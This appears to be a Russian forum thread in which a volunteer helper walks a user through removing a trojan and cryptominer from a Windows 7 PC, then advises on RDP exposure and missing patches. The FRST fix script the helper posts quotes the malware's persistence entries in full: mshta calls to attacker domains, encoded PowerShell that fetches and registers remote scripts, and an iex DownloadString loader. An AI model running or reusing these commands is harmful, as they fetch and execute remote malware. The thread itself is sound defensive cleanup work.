Вирус заархивировал файлы и папки

Printable View

22.02.2023, 20:26
lohudra

Вирус заархивировал файлы и папки

Добрый вечер! Вирус заархивировал файлы и папки
22.02.2023, 20:32
Info_bot

Уважаемый(ая) [B]lohudra[/B], спасибо за обращение на наш форум!

Удаление вирусов - абсолютно бесплатная услуга на VirusInfo.Info. Хелперы в самое ближайшее время ответят на Ваш запрос. Для оказания помощи необходимо предоставить логи сканирования утилитой Autologger, подробнее можно прочитать в [URL="https://virusinfo.info/pravila.html"]правилах оформления запроса о помощи[/URL].

[INFORMATION]Если вы хотите получить персональную гарантированную помощь в приоритетном режиме, то воспользуйтесь платным сервисом [URL="https://virusinfo.info/content.php?r=613-sub_pomogite"]Помогите+[/URL].[/INFORMATION]

Если наш сайт окажется полезен Вам и у Вас будет такая возможность - пожалуйста, [URL="https://virusinfo.info/content.php?r=113-virusinfo.info-donate"]поддержите проект[/URL].
22.02.2023, 21:31
Vvvyg

[url="http://virusinfo.info/showthread.php?t=7239"]Выполните скрипт в AVZ из папки Autologger\AV\av_z.exe[/url]:[code]begin
ExecuteFile('net.exe', 'stop tcpip /y', 0, 15000, true);
TerminateProcessByName('C:\Windows\services.exe');
TerminateProcessByName('c:\windows\temp\jlysmw.exe');
TerminateProcessByName('c:\windows\temp\pgwk.exe');
StopService('JnsUeif');
StopService('JQiGtNo');
QuarantineFile('C:\Windows\services.exe', '');
QuarantineFile('C:\s.exe', '');
QuarantineFile('c:\windows\temp\jlysmw.exe', '');
QuarantineFile('c:\windows\temp\pgwk.exe', '');
DeleteFile('C:\Windows\services.exe', '');
DeleteFile('c:\windows\temp\jlysmw.exe', '');
DeleteFile('C:\Windows\TEMP\JLySMw.exe', '64');
DeleteFile('c:\windows\temp\pgwk.exe', '');
DeleteFile('C:\Windows\TEMP\pGwK.exe', '64');
DeleteFile('C:\s.exe', '64');
DeleteService('JnsUeif');
DeleteService('JQiGtNo');
DeleteSchedulerTask('{360B179D-757F-495B-ACE4-FA860282C8DA}');
DeleteSchedulerTask('Microsoft\Windows Defender\ScannerSchduler');
DeleteSchedulerTask('Microsoft\Windows\Diagnosis\ScheduledDiagnosis');
DeleteSchedulerTask('Microsoft\Windows\Multimedia\CodecUpdateTask');
DeleteSchedulerTask('Microsoft\Windows\Multimedia\SystemVideoService');
DeleteSchedulerTask('Microsoft\Windows\Ras\WinSockets');
DeleteSchedulerTask('Microsoft\Windows\Shell\WindowsParentalControlsSettings');
DeleteSchedulerTask('Microsoft\Windows\Tcpip\IpAddressConflict');
DeleteSchedulerTask('Microsoft\Windows\WDI\UPD');
DeleteSchedulerTask('Microsoft\Windows\Windows Defender\Task Update');
DeleteSchedulerTask('Microsoft\Windows\Windows Filtering Platform\IP Filter');
DeleteSchedulerTask('Microsoft\Windows\WindowsUpdate\AUIFirmwareUpdate');
CreateQurantineArchive(GetAVZDirectory + 'quarantine.zip');
ExecuteSysClean;
ExecuteWizard('SCU', 3, 3, true);
RebootWindows(true);
end.[/code]Компьютер перезагрузится.

В папке с AVZ появится архив карантина quarantine.zip, упакуйте его в архив с паролем, выложите на файлообменник или в облако и дайте ссылку с паролем [U][B]в личном сообщении[/B][/U].

Скачайте [URL="http://www.bleepingcomputer.com/download/farbar-recovery-scan-tool/"]Farbar Recovery Scan Tool[/URL] или с [URL="https://www.geekstogo.com/forum/files/file/435-frst-farbar-recovery-scan-tool/"]зеркала[/URL] и сохраните на Рабочем столе.

Примечание: необходимо выбрать версию, совместимую с Вашей операционной системой. Если Вы не уверены, какая версия подойдет для Вашей системы, скачайте обе и попробуйте запустить. Только одна из них запустится на Вашей системе.
Запустите программу. Когда программа запустится, нажмите [B]Да[/B] для соглашения с предупреждением.

Нажмите кнопку [B]Сканировать[/B].

После окончания сканирования будут созданы отчеты FRST.txt, Addition.txt в той же папке, откуда была запущена программа.
Прикрепите эти файлы к своему следующему сообщению (лучше оба в одном архиве).
23.02.2023, 01:15
lohudra

[QUOTE=Vvvyg;1527107][URL="http://virusinfo.info/showthread.php?t=7239"]Выполните скрипт в AVZ из папки Autologger\AV\av_z.exe[/URL]:[/QUOTE]
это алгоритм лечения? А в разархивировании вы не поможете?
23.02.2023, 09:22
Vvvyg

Активная зараза в системе, выполняйте.

Если заархивировано с более-менее длинным паролем - шансов, даже теоретических, нет. Чем заархивировано, кстати? Rar?
24.02.2023, 00:03
lohudra

Вложений: 1

Да, rar(
27.02.2023, 07:21
Vvvyg

И снова тот же троян и майнер.

Выделите и скопируйте в буфер обмена следующий код:[CODE]Start::
CreateRestorePoint:
CloseProcesses:
Task: {01F84C32-F6D2-40AF-B03C-64900F7C4C1C} - System32\Tasks\Microsoft\Windows\WDI\UPD => cmd /c mshta hxxp://eu1.minerpool.pw/upd.hta <==== ВНИМАНИЕ
Task: {2B118B86-B96F-47E4-84EE-AFD29A491D44} - System32\Tasks\Microsoft\Windows\Multimedia\SystemVideoService => cmd /c powershell -nop -noni -w 1 -enc cgBlAGcAcwB2AHIAMwAyACAALwB1ACAALwBzACAALwBpADoAaAB0AHQAcAA6AC8ALwAxADAANwAuADEAOAAxAC4AMQA4ADcALgAxADMAMgAvAHAAaABwAC8AZgB1AG4AYwAuAHAAaABwACAAcwBjAHIAbwBiAGoALgBkAGwAbAA= <==== ВНИМАНИЕ
Task: {48D84F81-C658-422D-97E1-FA6717223A4D} - System32\Tasks\Microsoft\Windows\WindowsUpdate\AUIFirmwareUpdate => cmd /c powershell -exec bypass -e cgBlAGcAcwB2AHIAMwAyACAALwB1ACAALwBzACAALwBpADoAaAB0AHQAcAA6AC8ALwB2ADEALgBmAHkAbQA1AGcAcwBlAHIAbwBiAGgAaAAuAHAAdwAvAHAAaABwAC8AZgB1AG4AYwAuAHAAaABwACAAcwBjAHIAbwBiAGoALgBkAGwAbAA= <==== ВНИМАНИЕ
Task: {5300EBE2-757C-4973-B26C-47FEBC65AF2F} - System32\Tasks\Microsoft\Windows\Multimedia\CodecUpdateTask => cmd /c mshta hxxps://eu1.minerpool.pw/checks.hta <==== ВНИМАНИЕ
Task: {680E6A2A-5AA4-4E6E-8B89-0DF7BA844644} - System32\Tasks\Microsoft\Windows\Ras\WinSockets => c:\windows\services.exe [1631744 2023-02-24] () [Файл не подписан] <==== ВНИМАНИЕ
Task: {7AFAEBD7-EEAD-4E93-883C-1D8AAB7915F3} - System32\Tasks\Microsoft\Windows\Shell\WindowsParentalControlsSettings => cmd /c mshta hxxp://eu1.minerpool.pw/check.hta <==== ВНИМАНИЕ
Task: {84A873D2-A3D8-4A80-9E42-9EB49D71CCBC} - System32\Tasks\Microsoft\Windows\Windows Filtering Platform\IP Filter => cmd /c mshta hxxps://v1.fym5gserobhh.pw/check.hta <==== ВНИМАНИЕ
Task: {85F45167-84DC-4EF1-B7A4-4B73652C8768} - System32\Tasks\Microsoft\Windows Defender\ScannerSchduler => cmd /c mshta hxxp://res1.myrms.pw/upd.hta <==== ВНИМАНИЕ
Task: {962DE176-B56A-4CBB-8402-351B578F8A3F} - System32\Tasks\Microsoft\Windows\Diagnosis\ChkfsScheduled => cmd /c sc start cli_optimization_v2.0.55728_64
Task: {9FA419A6-AAD4-4A9D-9C67-DFA94B6E609E} - System32\Tasks\Microsoft\Windows\Tcpip\IpAddressConflict => cmd /c mshta hxxp://107.181.187.132/check.hta <==== ВНИМАНИЕ
Task: {A37F1F3B-E7A6-4155-AE30-89DB8E1C27DF} - System32\Tasks\Microsoft\Windows\SetUpd => powershell -exec bypass -e QwA6AFwAVwBpAG4AZABvAHcAcwBcAEYAbwBuAHQAcwBcAGQAZQBsAC4AcABzADEA
Task: {A6EBA10A-ED46-4A66-BCFE-D2355680B4A4} - System32\Tasks\Microsoft\Windows\UPnP\UPnPHostSearch => cmd /c schtasks /run /TN \Microsoft\Windows\Ras\WinSockets
Task: {A74A7AA1-3311-4D44-BAC7-E9D7FF2BDFC9} - System32\Tasks\Microsoft\Windows\IME\SQM Data Update => cmd /c sc start cli_optimization_v2.0.56730_32
Task: {D1EB3C0A-0616-40C0-853E-4B42BB2A1A93} - System32\Tasks\Microsoft\Windows\Diagnosis\DiskDiagnostics => cmd /c sc start cli_optimization_v2.0.56733_32
Task: {DC81E86A-548F-4B87-924C-2B02BB070EAC} - System32\Tasks\Microsoft\Windows\Diagnosis\ScheduledDiagnosis => cmd /c mshta hxxps://pa.kl2a48yh.pw/check.hta <==== ВНИМАНИЕ
Task: {E6A90E4F-7899-40D8-9CD7-C1708124C1B6} - System32\Tasks\Microsoft\Windows\Windows Defender\Task Update => cmd /c mshta hxxps://eu1.ax33y1mph.pw/check.hta <==== ВНИМАНИЕ
S3 cli_optimization_v2.0.55728_32; cmd /c mshta hxxps://pa.kl2a48yh.pw/check.hta [X]
S2 cli_optimization_v2.0.55728_64; cmd /c mshta hxxp://eu1.minerpool.pw/check.hta [X]
S3 cli_optimization_v2.0.56730_32; cmd /c powershell -exec bypass -Command iex ((New-Object System.Net.WebClient).DownloadString('hxxp://v1.fym5gserobhh.pw/v1/check1.ps1')) [X]
S3 cli_optimization_v2.0.56733_32; cmd /c powershell -w 1 -exec bypass -e aQBlAHgAIAAoACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAIgBoAHQAdABwAHMAOgAvAC8AYQAuADYAdQA5ADkAcQB2ADAAYgAuAHMAdQAvAHYAMQAvAGMAaABlAGMAawAxAC4AcABzADEAIgApACkA [X]
S3 VBoxNetFlt; system32\DRIVERS\VBoxNetFlt.sys [X]
C:\Windows\Minidump\*.dmp
2023-02-23 04:32 - 2023-02-24 00:15 - 001631744 _____ () C:\Windows\services.exe
2023-02-23 17:39 - 2015-11-15 00:31 - 1081708454 _____ C:\Windows\MEMORY.DMP
ExportKey: HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions
StartBatch:
del /s /q C:\Windows\SoftwareDistribution\download\*.*
del /s /q "%userprofile%\AppData\Local\Google\Chrome\User Data\Default\Cache\*.*"
del /s /q C:\Windows\Temp\*.*
del /s /q "%userprofile%\AppData\Local\temp\*.*"
sfc /scannow
endbatch:
Reboot:
End::[/CODE]Запустите FRST.EXE/FRST64.EXE, нажмите один раз [B]Исправить[/B] и подождите. Программа создаст лог-файл ([B]Fixlog.txt[/B]). Упакуйте его в архив и прикрепите его к своему следующему сообщению.
Компьютер будет перезагружен автоматически.

Сделайте новые логи FRST.

Загрузите, распакуйте на Рабочий стол и запустите [URL="https://yadi.sk/d/xIUtpEqJq4wru"]SecurityCheck by glax24 & Severnyj[/URL].
Запустите двойным щелчком мыши (если Вы используете Windows XP) или из меню по щелчку правой кнопки мыши [B]Запуск от имени администратора[/B] (если Вы используете Windows Vista/7/8/10).
Если увидите предупреждение от фаервола относительно программы SecurityCheck, не блокируйте ее работу.
Дождитесь окончания сканирования, откроется лог в блокноте с именем SecurityCheck.txt;
Если Вы закрыли Блокнот, то найти этот файл можно в корне системного диска в папке с именем SecurityCheck, например [I]C:\SecurityCheck\SecurityCheck.txt[/I].

Приложите этот файл к своему следующему сообщению.
27.02.2023, 15:05
lohudra

Вложений: 2

Logs
27.02.2023, 16:32
Vvvyg

[QUOTE=Vvvyg;1527139]Сделайте новые логи FRST.[/QUOTE]

Это не сделали.
И запускать исправление дважды - совершенно лишнее.
28.02.2023, 07:10
lohudra

Вложений: 1

Log FRST
28.02.2023, 07:48
Vvvyg

Лог пустой, нужно переделать:[QUOTE]Результат сканирования Farbar Recovery Scan Tool (FRST) (x64) Версия: 25-02-2023
Запущено с помощью User (Администратор) на USER-ПК (27-02-2023 15:04:03)
Запущено из C:\FRST
Загруженные профили: User
Платформа: Microsoft Windows 7 Профессиональная Service Pack 1 (X64) Язык: Русский (Россия)
Браузер по умолчанию: Chrome
Режим загрузки: Normal

========================================================[/QUOTE]
28.02.2023, 08:18
lohudra

Вложений: 1

Logs FRST
28.02.2023, 09:23
Vvvyg

Выделите и скопируйте в буфер обмена следующий код:[CODE]Start::
Systemrestore: on
CreateRestorePoint:
Task: {405EA566-D064-4882-A17B-F0BDE783B370} - \Microsoft\Windows\UPnP\UPnPHostSearch -> Нет файла <==== ВНИМАНИЕ
Task: {E71DB946-DE3B-4B75-BA50-B546EDF418C0} - System32\Tasks\Microsoft\Windows\Location\Telemetry => cmd /c sc start cli_optimization_v2.0.55728_32
StartBatch:
wevtutil.exe epl System C:\Windows\minidump\system.evtx
wevtutil.exe epl Application C:\Windows\minidump\Application.evtx
wevtutil.exe epl Security C:\Windows\minidump\Security.evtx
endbatch:
ZIP: c:\WINDOWS\Minidump\system.evtx; c:\WINDOWS\Minidump\Application.evtx; C:\Windows\Minidump\022723-19578-01.dmp
CMD: del /s /q C:\Windows\minidump\*.*
2023-02-27 12:24 - 2023-02-27 12:24 - 679247782 _____ C:\Windows\MEMORY.DMP
End::[/CODE]Запустите FRST.EXE/FRST64.EXE, нажмите один раз [B]Исправить[/B] и подождите. Программа создаст лог-файл ([B]Fixlog.txt[/B]). Прикрепите его к своему следующему сообщению.

На рабочем столе будет создан архив .ZIP с именем, состоящим из даты и времени выполнения исправления, загрузите его в доступное облачное хранилище или на файлообменник без капчи и дайте ссылку в теме.

Взламывают, вероятнее всего, по RDP. Поменяйте пароли пользователей на сложные, задумайтесь о внедрении подключения по VPN.

[QUOTE]Запрос на повышение прав для администраторов [color=red][b]отключен[/b][/color]
Запрос на повышение прав для обычных пользователей [color=red][b]отключен[/b][/color]
[color=blue][b]^Рекомендуется включить уровень по умолчанию: Win+R ввести UserAccountControlSettings и Enter^[/b][/color][/QUOTE]Рекомендую ознакомиться со статьёй [URL="http://www.outsidethebox.ms/10034/"]Так ли страшен контроль учетных записей (UAC)?[/URL] и включить.

[QUOTE]Учетная запись гостя включена. Пароль не установлен.[/QUOTE]Отключите гостя.

[QUOTE]HotFix KB3177467 [color=red][b]Внимание! [url=https://www.catalog.update.microsoft.com/Search.aspx?q=KB3177467]Скачать обновления[/url][/b][/color]
HotFix KB3125574 [color=red][b]Внимание! [url=https://www.catalog.update.microsoft.com/Search.aspx?q=KB3125574]Скачать обновления[/url][/b][/color]
HotFix KB4499175 [color=red][b]Внимание! [url=https://www.catalog.update.microsoft.com/Search.aspx?q=KB4499175]Скачать обновления[/url][/b][/color]
HotFix KB4474419 [color=red][b]Внимание! [url=https://www.catalog.update.microsoft.com/Search.aspx?q=KB4474419]Скачать обновления[/url][/b][/color]
HotFix KB4565354 [color=red][b]Внимание! [url=https://www.catalog.update.microsoft.com/Search.aspx?q=KB4565354]Скачать обновления[/url][/b][/color]
HotFix KB4490628 [color=red][b]Внимание! [url=https://www.catalog.update.microsoft.com/Search.aspx?q=KB4490628]Скачать обновления[/url][/b][/color]
HotFix KB4539602 [color=red][b]Внимание! [url=https://www.catalog.update.microsoft.com/Search.aspx?q=KB4539602]Скачать обновления[/url][/b][/color][/QUOTE]Устанавливайте обязательно, это только критические хотфиксы, включая KB4012212, который закрывает опаснейшую уязвимость, используемую в т. ч. нашумевшими в 2017 году шифровальщики WannaCry и Petya/NotPetya, до сих пор активно используется шифровальщиками, майнерами и троянами для проникновения в систему.

[QUOTE][color=red][b]Отключен общий профиль Брандмауэра Windows[/b][/color]
[color=red][b]Отключен частный профиль Брандмауэра Windows[/b][/color][/QUOTE]
Брандмауэр лучше включить и настроить (не удалённо, конечно).
01.03.2023, 09:23
lohudra

Вложений: 1

[url]https://dropmefiles.com/ENQCX[/url] - ссылка на архив
01.03.2023, 12:58
Vvvyg

В журнале системы множество попыток подключения по RDP с иностранных адресов.
Сейчас ни в коем случае нельзя применять подключение р удалённому рабочему столу через интернет, без использования VPN или строгого ограничения по ip адресам на файрволе. Взломают, только вопрос времени.

[COLOR="silver"]- - - - -Добавлено - - - - -[/COLOR]

Да, в первую очередь устанавливайте этот патч:[QUOTE]HotFix KB4499175 [color=red][b]Внимание! [url=https://www.catalog.update.microsoft.com/Search.aspx?q=KB4499175]Скачать обновления[/url][/b][/color][/QUOTE]
Множество BSOD, вызыванных системным файлом termdd.sys, это как раз с уязвимостью CVE-2019-0708 связано, которая в системе не закрыта.
07.03.2023, 13:48
lohudra

[QUOTE=Vvvyg;1527192]В журнале системы множество попыток подключения по RDP с иностранных адресов.
[/QUOTE]

Добрый день! Спасибо Большое! Систему обновил, патчи поставил. Подскажите пожалуйста, какие дальнейшие мои действия?
У нас на предприятии проходит тестирование, настроен проброс на локальный ip-адрес, с портом, плюс как вы говорите открыт rdp по внутренней сети до этого ПК. Буду отключать правило проброса на прокси, чтобы исключить брутфорса, отключу rdp
07.03.2023, 15:30
Vvvyg

Тогда по минимуму всё.
07.03.2023, 16:25
lohudra

[QUOTE=Vvvyg;1527255]Тогда по минимуму всё.[/QUOTE]
СПАСИБО!!!